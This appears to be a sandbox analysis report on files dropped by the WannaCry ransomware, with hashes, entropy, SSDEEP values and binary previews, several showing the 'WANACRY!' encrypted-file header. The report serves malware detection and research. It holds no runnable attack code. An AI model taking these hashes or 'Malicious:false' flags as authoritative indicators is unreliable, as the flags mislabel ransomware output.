                                                                              Preview:.V.tiD...C..]..<.F..hDH..5..q.o.(0.y.,...F_Q.I.(Q.,.O...Q/.I ?.;Jq.vx.?.F........(.&..y...m6.).4.f.i.Q.....=m_(..|....=G.Xh...e.......K...+9..'..`$..Wg....Y7..........W.qc)...`.....,...(.AO....+.4E..j....!!.HTz){......P....4-f.;TA..Br.1....5u..v.*.H..\..T@.WaY.A.X....&i..w.I...@.F;....G......S2S...S.;.*.n..t.\<.....:.._m.k9..#..=.5|..V.hmq..Br.W....S....G.6.^.N.h.M...V..d.....f[..nL....8nt.NQOw........1A.z...u.D..`...9S_aI..@..6A....I.-d.....{.m.?}.Pv..N.._..+...1...H..c......H.....B.%Xl.3..^h~a.|~q......u.&....83h...coT...n}... ...G..|;...{.:..$.......J.....e).o[.~...Y......DC.G.F@I.DZ.H4..\.....1].:..d...+'s..r.....9P{.!.<....^.......r2z..:..k.y..d....$..o..-..Xq:..$...f..v.b%1...R.k..f.-.2..Q...It[....W.9..k..2...e...v!J.GJ..X`D..^.C....G....)C..V..f.(Ml.f\...],..5...3.0.nY..W.2.w8.\.Y.r.....D.E.U.*.zY.....8..BCr...}\.W.U..B...bz.z....P`[...MBy....g..CO.F.>D..l@O..G..~.f.....,..fq.z....c.....'....YY.....t....7...f...m....Z.!.lT..h.+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.799755529702723
                                                                              Encrypted:false
                                                                              SSDEEP:24:BgiwNNNurqxfAaLyV1mVX7s5z31FIej4avKzvjKPCc/7L:BbwTJfAaLYEpyz312ejvv+LKPHv
                                                                              MD5:98D5290EEF6EDCD1C597D19F8FE991D3
                                                                              SHA1:FE069B1CDD98EF13D67BFF4F1A39EACB458D07E1
                                                                              SHA-256:F83DAD483DE8B8C7A3BC10AF0544366FD567C972D72FAF404FB4796DF581E2C3
                                                                              SHA-512:25459B46E1D9ED0693090FA434426DFCE1A009BB12B79F711892465EABC20801057E198158D759E0FC3646B348A4F7E777BD921787A88BD34FAD9E34C7415DD2
                                                                              Malicious:false
                                                                              Preview:.4'...N>u...t.....R.v.4.p..P.P.......D..n.-..#....p,.y.-.>.Z..M..b.79D.uzM......M.>..;7k.O?.G...Q-..g.qe..PtO|.-...y.....f.q../.J;..).d.A..I.....|..n.....W..~.|..)j'.ugj.E.Y_.....X.......Q*...xA@.......:.F.JI..la...$3...+.h...5.....S....M..)Z.._.6..{.\..u.$[...1ET%$..s....$..(p%..'...o.q.z.VLw.M...;.0.D..bk....#L..L..B.b.{..k...vN.....Qw.{.@.`o}..sa...j.....>.z.D~e..,..9.b iyJ@1E....7H.E...>.#%>.i.!..!N.}.a.Lp@...7:..T&U.=~.....ya..A.....T.$.b...."i....T..I...w-...1a...Q.T+.M......:..1.*..~...Lp.B=...a.._.. ...+Th9=X.(..~..WfW..b.......D.Ze......I..8b.....oxO...-3...~.H."..%9....{.Xi....[..k)jF!@*".......=.&MZ..F.bHj.`S......v.i.b...a..b..!p.UX..0ER.[..x....l]iJ.N.6..T.4K.r.c.j..$O.m.9...e.yO.G$_.KU..*=L.1v..R.C.-&.m....3_......S@.+.7\...c.S. 7.M.,~}.......S@wS.+..oE......(....2..&.L)...U0M%Q....C8..W.k.....3...|.f....Pe..ct..K(.;....k..gs..D.U..E...4.M....S.a...n;lX..A...<./.T.....p....Q.S.d......ZU;....w.F..Y.kU.'y..n.(..g....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.807498766246624
                                                                              Encrypted:false
                                                                              SSDEEP:24:pjNbkl6avOoONzVtY6DMkILyUX+E1zyJjbopoD5KXNCs:RNbhLdVtY6wkILyiVkjboCD5y7
                                                                              MD5:FE93ED13DAFA5B3C1BE3188D616F0844
                                                                              SHA1:0461FD1588F655185A22C66DA313BA238EADAEBC
                                                                              SHA-256:63E737E15C5D124853758A6F76855651156397579E361BC3A128E88490AAEB76
                                                                              SHA-512:10C91AEF0BAB4664E181002B26235986550A5016994EEDC876BA960B199FB632497B094BA455BC692324E3F279057CC87BAEB8672C225AD84D641E9919974604
                                                                              Malicious:false
                                                                              Preview:...^.....Y5.>ft..$.noa..j_..T9>..?A1.+?@...%G.....I,.di....k.......p.v.........=.B...Es..".... ....?9F..E......a.,P.. ..L..w.:f.'..nH....v....o..:L.p.wH.%..a.f,......l...$.~..`b.Z.:...&(... .&.Xyy.M.:.C# .V..".b.r.......f.z.a.d.k...X...h9.....W...?..#t..].z..M..n]..%.x.R...?.....2L..........Q.S..F..."...v.|9....]*}:.:#..K..xV....S..e...m..>,~.{......."G:..R...t3.. m..p.k....O\.4;.A..I.nV!..y`..6...S\d...$,.PCb=...P4../R......a.....<[.0i...<......_..a,x.....J..n<HYX.l....X...[l.}U..KD.)t./^.X. ..D.wO.C.r{..Qv.>S.>.../...g.Lt..e.17......-Hi....A..F%V.K[.ynN...R...V..A._'......5EW;M....y..X.J.....oq..8..u..NH.1.v}..........$....,.o....(.Jn.X.hk;.L1G.1.=.S.G.1A...n.^...`>5.$#..O...?.p....3....]..O@...w/..W.......9.[.<..... ....+....rJ....]........).g=........R......d...f.D1.Sc..{.......s..E.K.}Y........0....om...Z..Y........N....Oke@..G(.L..o."......G.8..;`...I ..-.PS.k........I......6&Y\ZI...33..&.\..v%.+.W.. ...e.)k.*."..YN..N......@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.843886909539243
                                                                              Encrypted:false
                                                                              SSDEEP:24:qI3jZIyaZJ4TTgp7Vt9wIS/4wTETnCt6RCG1/LtfTtfv:q2OYTKi8ca3RCG5Ltbtfv
                                                                              MD5:985C9D7A7EC2E77A7B66849AA7FA4D38
                                                                              SHA1:14E01800874BA9CF3D9ED3658A2E31A04A72602B
                                                                              SHA-256:08A473B5A6BCC4EB04B368C106A12B600CF78E478AF2FFF0FBE5234B3884CFB0
                                                                              SHA-512:9479A65A3A078C77AE381647FCB096106ABFC5D695FD6C6F8AA5E0E9756FBE820E20D527EC27363E13F1093CDD8B82214A6783B7DB340C6B29B0A611F6FF49AC
                                                                              Malicious:false
                                                                              Preview:.....n^.a.* I)....8<.r.zy....6+..DA~Y.U&.J...sn.l0Y1... .Dp/......}.d.]qe..Q.]..3...A.......W..........6..f&.&.l.l.C|r...,H..*....JP...Vf.|.v.n.......N......9.p.tG...p.l....w..L...=..M..f...;o6..Zs...ld.e.M..5.}q......,....Q%7.|.y)|{lFg.U.<.)E...$K.c.7E.j.p..D...4.7Nq.I.5.@....S#.B...sc.,n..........O-.......<~.mb!...?..^......t....6f....:W....?4...L...0...)..4...v..:y=.>.9.......i.@k..%0..V.k..@...;zw`......&)h..{.;..E.......eW.(=n.}.WP.-....T....'Rcm.f.w.=.(-.'.$.s.X.LU..04.9.8!3.8..`.:..U.:|K../...%...bq.B......j&.............T..q].JS...?.x....3.j ........=b..A!.....U.D.}Z...SWt....*A...p.w.S0.{....BC..........#....k%.,.....*.y..ts..Pf..T..5.^CM........Z&..K,.4.se..h.q.h...L."....jx.W..X1..t.e..j.s.....P..O.7C.Q.7.g.@E"v.....]....`....X..q....iJ.HN..s...H...wG.Jb5..........3.....s..a.Dm9...#|.k.Cw..B{.%n.$z.&,..l.\h.......h.w....L}.V(..._r.7.v;..fK. ..F h........g...)....H.g.F&..0s...\.q..<%.d......+....C9..E..D8.....+-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8122644909164665
                                                                              Encrypted:false
                                                                              SSDEEP:24:4VtgBlPsSIPvkhIvBjGvWvF3MvfMf3ws/3ShDCob20o0:YKRsSIPvYsBSEhGoR/uCodt
                                                                              MD5:1C59DF551D096BD1E240A64AF3F51ABA
                                                                              SHA1:1938DD48770AC732F1F4C96C9ED88356501E28B8
                                                                              SHA-256:212B4F266ECB2751A8C75F56CA28FA78CB226C702E9C9E73A601216B6313E805
                                                                              SHA-512:A4DA0552760FA6A5207D0F99D5522DB8A0D5CD81C300AEE04EE6A8D1C6A3E0422F5E14B04DF9BB38C624A0C40847E69ACCD21C1C2E9FE5D66D5643489104B811
                                                                              Malicious:false
                                                                              Preview:r..v..D...kZ...n.R.G....K@-....v.../_x.OX.aaD...?..y9..p-j..'..^.cnl..9.....4.:hH..-..<..R.jo..U_.n6.LY.z6...!?Y...|(..U....3.Oz}..kz.1..d..JV..1..J.(.T..p..?...+..KLpM.y..'ic#...1.G..T..3q.g.AP}awr...j..5L..*JUH..o..(........kC?.C.e....i=+..S....l.............x...A...%........B.....&.\....l.u.X..I..(ef2U...A.........s........g-.......{P(.z..m..`....d,.N}.~I..Z.5.S..%..Nr..{|.....z.z.N6..O......q.....r.>..*d,..-x....d.l.z..t%/.6...c.tV....L..j...b.A.....70..mm..@...h.....2.g`a.N.Yt.i..*.x.2........2..\..e...7...6.W..g...K/...o`.iP...*..0...l7.-.Ft...._.D..Q.k.|4.k..C0..y.."38.9W.FL...M..../...r.yR%q.D.......n...88[i'......LZ...n..E,.....EqB;.O.g.}..d.Jh.e4..7n^o..n..!.u....x.L....e.e...6....4.!6M..1.e.].#i).).Z..$..F.{~.F9;.#. .k.q...WK..P.P...............x...k.._~.U.ax./....!.D...S..../..j..ie..Q..=.y...RB.h....?.e.U..o...gB..56..H.|.~n..n.....u0./e<>.u...$iF-..|.'Z{.i........@..k.l..w_.....9./.....).G..Y.....\.9.t.}.o.1!..3T."...f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.809661087436381
                                                                              Encrypted:false
                                                                              SSDEEP:24:YN2rrMEqtO+bI2gFscAeTP9riux10pRGcYNszxKgY+CTA4QljpMlu:YArrjqpM/AeJOuxARUKbYlyV2u
                                                                              MD5:930BBDB21EEC1777C280DEC71EB6385A
                                                                              SHA1:B0863A38998CA1C7921FBBECC87233338F1DC14E
                                                                              SHA-256:93DB6143E670419195B7029370747C329CFD678F9FB1D6C9E8C6A8AAD519CE40
                                                                              SHA-512:3E48AB1D3B8609DE2726C2B9E9758ADDC3871CC456A7EF9535FBB2B2934214F237B22F25D2694F02AF288E52224D44B45BB0D0C608E96941E4325B7147642719
                                                                              Malicious:false
                                                                              Preview:!..bE.K.9/.bd0..z.....,}.0....~.......?.^..'.*.P.*+.i.`d...6.2M;#6..C..{..C1..g_'.e.'...(..{.`....9v..cA..d......`_.*%D.`.{....,N....Bn.mn.....@.}.M.2....T)..5.(j..,..S....*...a.]..T.Ro>.....m.P'^..k...o.1.m.Z...`.a........T.6U&k%...n((..R.I..F...K.Py.`..=._.fr.0h..[!K.F_X....d..[.......5...SY1.~.|.o.b+S3...!..:.T.X.h.E .b9......MVk1.i.:s..=Cv.G.....H...h.b6..1.d....TJ....L....A.D.Il.@...G..I....*@s...N.M.ta.."=m3.C........"..h.W..Y[...L...._.yY6y.....|.\...:.Fs.e..E.0.cDen..L...v.OY....aG.P....g4..>fG.....7..8.....(......xNQ........(a.Q*&R... ....i...W.R.................$./4....]=...............F(b........~.s..|..um).i9d.I..w.2..R.3.......S..fn.o....d<....]L.....2..G..,#....Fn.f.....[...@..t.... .t^...)...P.o.]t.b...!_.._.(..#..dI+.......g.m,........z&......O.7.D%.h.,.L. #5.`9.j..(../"+.V.e3!.{`.B.b..U.}. b..........*.o\n.#.,Oua9...B...E....8..UrV.v....n.p..9....~%...%....cQ..\.w....!..s.E.B...:...........Q~.....Dj...z..T.=.....*.GP]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.819495440606118
                                                                              Encrypted:false
                                                                              SSDEEP:24:JU0VRcfDpvVQTr4I3NaGMKHKzbLMtHPZLp2fgXTfZiUYvX:JPKfRVGr4IknjgjhU
                                                                              MD5:D23357B6CBE89BF5DC9BDC465C9A726A
                                                                              SHA1:9984000730CA88B18060194764A9A670B61E8642
                                                                              SHA-256:98873BAEFE803838B1E370A5C4A85D5CA7457338A3A83FCDB942B9DBBC1BDE67
                                                                              SHA-512:827F7DAF9C372F44977E802DA926B2FB941CFCA016C1EF9025C55FB8A71307754C9585256887B925CF01613155A52BBFEACCDEE0F2DC020FCC0E7BA8D92D6617
                                                                              Malicious:false
                                                                              Preview:5J..3.b....2......,......(eG..O...z`.4TdB....\._7.j...o'....]....{.'.z.XDM.t..W.....e..*q..>A..iT.F...m?.$j.{!)...a.+y.F#...S).`56....-.l........i...1.]A..&,*..h...X...:.Y..,..[.".0.cia...z2...P..v.nN..U.`$@L.r.]....4..^......g.c...%.....g.6...|....t.......<...b4F%...#......."#.C...nZ.1,d.:..5....._...Ul.N..].Z..d...#........T. ..?_.E.C.w....+....l.$........b.$.?V...`.s...^......<..m.{+Y.T...u..y......n#Rg.x...H..t..8.!....U.U.g..Dq.....".w....I/|.......yqX...9..R.ef>.....m.et*......z?.z$Z..{.bwx.r.h.....{.Uf.D..*G.K....!..hg...o..Yl.}.(eo..5(|;...^B....&...9......1..B&.......)..lw.B.K.B.Y.3+.....0...3..qJ2. ...0..G.oQ7BP...1._..J.5....)p....-..).$.-.....q.]{\.......#..@A....H'.l.4wi.@d.m.~..........4.....X...Y."..V.O.d..~c.7].q...e.M;.@....B..E..'...........j....\.W.n.:.!r.Q..:.......L..dS.............fm...N*.t.Y..[..(+U..H.....A....pS9....kR....f.A^...\......]`..\.v.{..~n.%0.a....<__...bW....7...H*..Z..n<.>....p..K-.w.s#....A...Q.C...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.843665139243041
                                                                              Encrypted:false
                                                                              SSDEEP:24:gCeDePA+rFbV+22cDvGlxTuL+OzVHWKDJoPy1TA42cYLG1:gCyePAYA22cDvITkzkcNKc0W
                                                                              MD5:6CC2D7B6424A85890DEE8FA771B4B782
                                                                              SHA1:565540F85ECAF2A54505A1F7257E689C3F1563F4
                                                                              SHA-256:BDEB94B8A449A138A1E25166E69D2D456BF815F8E93681BBCEA54B77B52C090E
                                                                              SHA-512:539E83D34B04D79E60E75D2F083E0476A1BB25604BAD51B17970A76A91D9118C386A36FD5EA623A8D4728AB998EA54408E673FD3C75DAB69B21AF1196A1CA152
                                                                              Malicious:false
                                                                              Preview:...V/.O.jOx-.%.T`G..b....1...'(u...Q....[..2E.4.i.......T.)..7...._.se..E..=.....SR..=.\;.B.Ug......... 0....j.YWu.Y.....B..k.....D.#A.rF.......8.`..._.n..Z.....sP.7.P...:...@.Zt.C^$.E...o.c....9e._(...57..y..;...........1.`/..S.H".BY.^..?A.....O.....X..p.... 0f_..S...fe;..=.,2..=....][....$.j2G.9/.v.Z.L%.t..M0..u.`p*..p+.>..Y!....>...*v.]...w'.a.X.K...s.:....G..~>v........l)Pc.......}...8.....}.1}...Xk....e......k.n...Pd..}G.....R`...)..AGg~.h....`.v.3%.(.+..G.u1g_BS.]i..~8P..\`.h..pg.S...s'.w..c.h5!..].7q..G6..(d....].c..j.........S.....aI...B..B..:.+6q.>..-...S..bH3X.b$""..<.T.`...6...3.........Z...vX.....jC.h.gP..Zw}EFA.JS........X#...,...k../C.O..V.xL.. ..Y..m.&...7..n..z.V................J..Ox.@..g..qK.I$i"..3.=.k.IxC.......x9..."...u.F....5.IrO....ED.8+./.G.g...N)tf.|.q..p~...,.....l..\).....&*..g...\E-u......d2.....S%.l1Y.}U%...]....$.&e.%5=.k-`..M.A%...i..W..f.|....({}!...._<.E+.w.ZW.G..o.........V+......901...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8030495250447744
                                                                              Encrypted:false
                                                                              SSDEEP:24:KF14A0RC0vP93BChU2F5DtmpC7cX0MJRknlcJqkjHzK:zAqCy9SU6PmpkcX0znIzm
                                                                              MD5:5653231EBF361CC7958721913D4094C9
                                                                              SHA1:F0022A01EE4B26219C626C1D74A55D3012BAAE93
                                                                              SHA-256:7387925193F2A9EC1F054FCF62679A56DC790D4C288DFFE36CF94A94C30B2C5E
                                                                              SHA-512:A68CE1DDD2BF0D708029C6447996A096D2D4483110F1E995ABF4FE554B60BDD40A5B10A583701C4CAAF26D0C18C063F2B596E6269462924FC32A409DC7FA619F
                                                                              Malicious:false
                                                                              Preview:.7jIO..N..........3....R.6..X..8..N...xf....U..+sb.nyQ.?L..`.C...............pU.gs0..(..:o`..XPk.spK.tE..T.&.&f.p:.t.8..an.wp...?..)5.... .Vz#..dl=...M..gExz...g&&...F.{.).N...|.b.....H....k....q..&M*...v..d.E.5.A......@o.E..SWy..9GS...1Z.!p..].@x6.RK.q@..96?.......;.~.9.\..M..$\...LHt.#.1y.!T@...jJ.@.w....q..z.z....`....P.}.jXpa...K........Pz..]..7..*.../..r.2.O....!...P.Qt..3......t.|.eU.........}..^.au.*............kdt?..a$..y....8.a....v...U8.u..VY.k.Q.mT..3K(.^8...e.&S.p...... 3..XNY.u.z..X......W.<<K.~1.~........-..^.]...)zg...(pG..|nd|..>......Sb'..yYT.Z=..d...&.......T2.!..QP....|-(.L..y12lf.....r...k.ds.K...Ah1I.dtw.&|......?.0..%.@ .E..L....F..... T..y.../uX...lw..........Q...e.[.RC9.....$.@#vL.!.....z.>.....C.....^.=...........v..S.*....$.N."P2#CrUeQ.D~.P...h`.....>..D...G.n.r2]....r.b..t5.i...#|.J.....7...%?........>........k..T..........J._..Y:.........=u.......j...:.`..k=...|...@.8kY....'.....H...N..BV.i...?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836222778700265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkM6fPWbllFVlFsbHt4YqNJS64CqwuGU5D7blte3Xmt/F0Q6BiseYDUC:bkMYclFVlF5YGJS64B+ST3yPLoseq
                                                                              MD5:7D574694AA3871F8F75EF2C458EA7F8C
                                                                              SHA1:EB413D569CC664E048780B0F097F2C8A8FADD5D0
                                                                              SHA-256:01A8446D12BC9C338AF4A576A9BFDD2B97C98515879C5350BDF6F0F854A9263F
                                                                              SHA-512:38C54EC38C71552B96FFB87600910CE9595C96D38FF0431B94C03C13ABC79B2CCCE0A0D1605F8898D8C91D6E0D7FB9908C3680095EB0D0E4FD0EBBC24D8544AF
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Dp......x...h>.%.&>tb....<. ..u.......t......~..P.u....;U..X.>.4.....[..UL.....mGw..$.i....>U..Y.4.L...".V#......5...`.G.."^,.........!u/..X......6..H.h....%..>|~..O...<..y..]3..>.q.L.=[.....o...=A.aP....q....i..6.......I.B...&.....b..'............N..#>.FA..[.....+..4......L.c"..b.&.L.m8,<4..>m .dyf..U..&y.|.8.....E6...M.a...=.h,F..0>.....C/....../.".X.........Ca.b~>.\~....(i.S......D.HL.x...KF.I..{nk.9.n{..Z....j..pR&....7;...>....].dx......H.c'.t.6|..Z.l.[......^..xI.k.y...,!#Z..b...i...>x..q>.%fo.....z.u..w0$..:.......5YB`#2..kyU.v.& N..k.OZ....#(.9.(.}6g....]........0.......P...V.=..d.....G.....o.Iv..y.A...0...wAW.*....:..{.........@Y..`..(..&O.O..6........6.\v....dZ.M.h...m...rT.U.;..F..Z.U..w..V.s...J.....S.CFkx.L.V.S..5......R....B*.+....>>......!.|Zb....O.._..x....;f.J.c'..._.6.>!...2.O..M...*_..p..Lj...z...!(jJ...^B.......Gy.UD5Bk....Y..}.;.%..0.q+...\Y...1!.'...2..s.v....g.H..FW.".U>.CBI.k[...`.mj.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836222778700265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkM6fPWbllFVlFsbHt4YqNJS64CqwuGU5D7blte3Xmt/F0Q6BiseYDUC:bkMYclFVlF5YGJS64B+ST3yPLoseq
                                                                              MD5:7D574694AA3871F8F75EF2C458EA7F8C
                                                                              SHA1:EB413D569CC664E048780B0F097F2C8A8FADD5D0
                                                                              SHA-256:01A8446D12BC9C338AF4A576A9BFDD2B97C98515879C5350BDF6F0F854A9263F
                                                                              SHA-512:38C54EC38C71552B96FFB87600910CE9595C96D38FF0431B94C03C13ABC79B2CCCE0A0D1605F8898D8C91D6E0D7FB9908C3680095EB0D0E4FD0EBBC24D8544AF
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Dp......x...h>.%.&>tb....<. ..u.......t......~..P.u....;U..X.>.4.....[..UL.....mGw..$.i....>U..Y.4.L...".V#......5...`.G.."^,.........!u/..X......6..H.h....%..>|~..O...<..y..]3..>.q.L.=[.....o...=A.aP....q....i..6.......I.B...&.....b..'............N..#>.FA..[.....+..4......L.c"..b.&.L.m8,<4..>m .dyf..U..&y.|.8.....E6...M.a...=.h,F..0>.....C/....../.".X.........Ca.b~>.\~....(i.S......D.HL.x...KF.I..{nk.9.n{..Z....j..pR&....7;...>....].dx......H.c'.t.6|..Z.l.[......^..xI.k.y...,!#Z..b...i...>x..q>.%fo.....z.u..w0$..:.......5YB`#2..kyU.v.& N..k.OZ....#(.9.(.}6g....]........0.......P...V.=..d.....G.....o.Iv..y.A...0...wAW.*....:..{.........@Y..`..(..&O.O..6........6.\v....dZ.M.h...m...rT.U.;..F..Z.U..w..V.s...J.....S.CFkx.L.V.S..5......R....B*.+....>>......!.|Zb....O.._..x....;f.J.c'..._.6.>!...2.O..M...*_..p..Lj...z...!(jJ...^B.......Gy.UD5Bk....Y..}.;.%..0.q+...\Y...1!.'...2..s.v....g.H..FW.".U>.CBI.k[...`.mj.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.864501179227015
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwsy4/vKwC0ynB4XnIJ1u+Y3oIgwZ495oKgRXttIXtSyISEptruEAQ5:bkcCzCjB4XnIJg+Y3ae4fonAISEpZqe
                                                                              MD5:9577E523C0B762C98974A6EEBC117A07
                                                                              SHA1:D007111E518DB226446528B5C162C8ADFDB2DF1F
                                                                              SHA-256:AB6A8F59A164E06788E971D44F3F31A34ABEAFF32E5C0A79CF6114C3BE395AC2
                                                                              SHA-512:6FF983D76D2526C84A9BD1317784147DCC7F8A59BA15BD81E02FF03E51B48116866724CC1B0DEFE3CEA109DE7090FA0FF27FF2F216383B3F8D56FEDDCF165FBB
                                                                              Malicious:false
                                                                              Preview:WANACRY!....{..@b..:.x..OlK...$.3.K..Z.d.SW....'....w..?..Vx.e.N.+{V..S.V....y8*...$_v1.2wo...X.........2.....I...[..?.7|..G...].E.D4.C6.>.+..v..#.....A?).2..<.\Q...O...).*T.3B....N.|b?..h.......6....G.j.y`Y....bZ.I.^l..0~.g.......`.kk}.z..a.._7.D.<$.0..)r'..g+...............l.f...............h.N.8.z .......:s...e.Y. ^0.-.>uR.....j...(..R..=.Y....r.:@.$IN.VF.....j..W.[.Zx.Q.C..G..|..OoG.-....{...c....J.Z..]......m~..]..m.Y..1.n..(0_.ez5.*W...A.}.N.9..u$...[[...O+.v_u.8...,8....!..U...#..S&>..dw.....r...D...eW..T.d..0^.M<.s..|3pF!.G.....V.X..7m..F.c..I-nt....L}.~.1...Q....5.>.GE...f_....a....$...ir,,&....pf."....!vm.-q.........N.......{..^E8.7#../....c8..Xy'ndRHc..[.....'2E....R....)s;.G...oK%..K..4.......R.b....Gh..=...IfTX.B.....~....x2...o.1n..)..^t.F...SC.g7...z.K.c..a.r.Q.O.v.)\a..:............+c.3......y.2.G.K..%M.....zX.6.}...v..F.D>._...m...C..0t._..n....K..}..yH0.9.wm....'.`...].&...y......g.$>...l.......[..S`T..>....O..[. ...'..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.864501179227015
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwsy4/vKwC0ynB4XnIJ1u+Y3oIgwZ495oKgRXttIXtSyISEptruEAQ5:bkcCzCjB4XnIJg+Y3ae4fonAISEpZqe
                                                                              MD5:9577E523C0B762C98974A6EEBC117A07
                                                                              SHA1:D007111E518DB226446528B5C162C8ADFDB2DF1F
                                                                              SHA-256:AB6A8F59A164E06788E971D44F3F31A34ABEAFF32E5C0A79CF6114C3BE395AC2
                                                                              SHA-512:6FF983D76D2526C84A9BD1317784147DCC7F8A59BA15BD81E02FF03E51B48116866724CC1B0DEFE3CEA109DE7090FA0FF27FF2F216383B3F8D56FEDDCF165FBB
                                                                              Malicious:false
                                                                              Preview:WANACRY!....{..@b..:.x..OlK...$.3.K..Z.d.SW....'....w..?..Vx.e.N.+{V..S.V....y8*...$_v1.2wo...X.........2.....I...[..?.7|..G...].E.D4.C6.>.+..v..#.....A?).2..<.\Q...O...).*T.3B....N.|b?..h.......6....G.j.y`Y....bZ.I.^l..0~.g.......`.kk}.z..a.._7.D.<$.0..)r'..g+...............l.f...............h.N.8.z .......:s...e.Y. ^0.-.>uR.....j...(..R..=.Y....r.:@.$IN.VF.....j..W.[.Zx.Q.C..G..|..OoG.-....{...c....J.Z..]......m~..]..m.Y..1.n..(0_.ez5.*W...A.}.N.9..u$...[[...O+.v_u.8...,8....!..U...#..S&>..dw.....r...D...eW..T.d..0^.M<.s..|3pF!.G.....V.X..7m..F.c..I-nt....L}.~.1...Q....5.>.GE...f_....a....$...ir,,&....pf."....!vm.-q.........N.......{..^E8.7#../....c8..Xy'ndRHc..[.....'2E....R....)s;.G...oK%..K..4.......R.b....Gh..=...IfTX.B.....~....x2...o.1n..)..^t.F...SC.g7...z.K.c..a.r.Q.O.v.)\a..:............+c.3......y.2.G.K..%M.....zX.6.}...v..F.D>._...m...C..0t._..n....K..}..yH0.9.wm....'.`...].&...y......g.$>...l.......[..S`T..>....O..[. ...'..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845702352709017
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkFCyCdIS/9Mau6yhD/IquBGBtmSsEmHNu2BTbkJVr4h1lb3Z9TpoIVtMU8f:bkFCHdh2wyVLuBGBrsh426rg77Z9TvVy
                                                                              MD5:D099ECDF789C7B186EDB4B882D8921CE
                                                                              SHA1:A66D23B0F68962CA4812AC48DF4CB2E3D66786C6
                                                                              SHA-256:04607F3094EBF3B29800ADE99E3A7F7EDDA97EA4CF2016FC4FA911DE3ACC42FF
                                                                              SHA-512:DF55C30C55FDF51AC100D6B168D7777E9F841094A14264CA4801392F08EEBC4F1C18C7A541B9E5DE323FFA51FC2F04B32F937DC43532E512E0C92878A81B0DCE
                                                                              Malicious:false
                                                                              Preview:WANACRY!...........M.,7....$.yy...:.....x..w..(.ICA..l..H.%HC.....I.T..)....m`G....Y....0{..(...q.{..J.$.x..3...Lb.........O..M...p...Y..STAp...[.P.m.T;....o......q=.t.>K;.u/.........*..Ci.......e.g..........Ki[b.]...8.S..LC..........^....hV?j./....................;N.S..J.=....8n..e...Q..* .B......Q..i.]....x.=.@.+...(.7..{...{..K....s. ..Vj&C.-......OT..~...<.c......^.&?E.bV.Px......9.3..LZ.G.Rt.k.$...>...G.....@.T.....FJ..['.F...B7N........&..w.=............J=/.Ep.c..0..%A.TF....%,...Zw...&..6!m4 =.Z.v..YXDU.?..j>......X..k@x<Bu.).....y........h..6.k.....yvQk..U.5.......KjZ.s.e.SD.......*....(..Y..6,.....6:*Z.....:.H..+.QhL.]....k...\.~.......!.)..M...d..<N:7....A...b..>...'...h.} w...0W5..Y..C.{0.5D...2...=</k.^.............?!.v q.BL..t...H..?.?.SGw.7Q..Jq.s}`c...L....og.Q......}....._....3p:...;......9.sV.......3.!._.E`W.I?.Xk.&L..f....s.....W.....8..V.$`.WA".1IM.J_...X...+.....IL8..@%'f1...E..4..2.s@...../.....T.b]...._".{.J.D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845702352709017
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkFCyCdIS/9Mau6yhD/IquBGBtmSsEmHNu2BTbkJVr4h1lb3Z9TpoIVtMU8f:bkFCHdh2wyVLuBGBrsh426rg77Z9TvVy
                                                                              MD5:D099ECDF789C7B186EDB4B882D8921CE
                                                                              SHA1:A66D23B0F68962CA4812AC48DF4CB2E3D66786C6
                                                                              SHA-256:04607F3094EBF3B29800ADE99E3A7F7EDDA97EA4CF2016FC4FA911DE3ACC42FF
                                                                              SHA-512:DF55C30C55FDF51AC100D6B168D7777E9F841094A14264CA4801392F08EEBC4F1C18C7A541B9E5DE323FFA51FC2F04B32F937DC43532E512E0C92878A81B0DCE
                                                                              Malicious:false
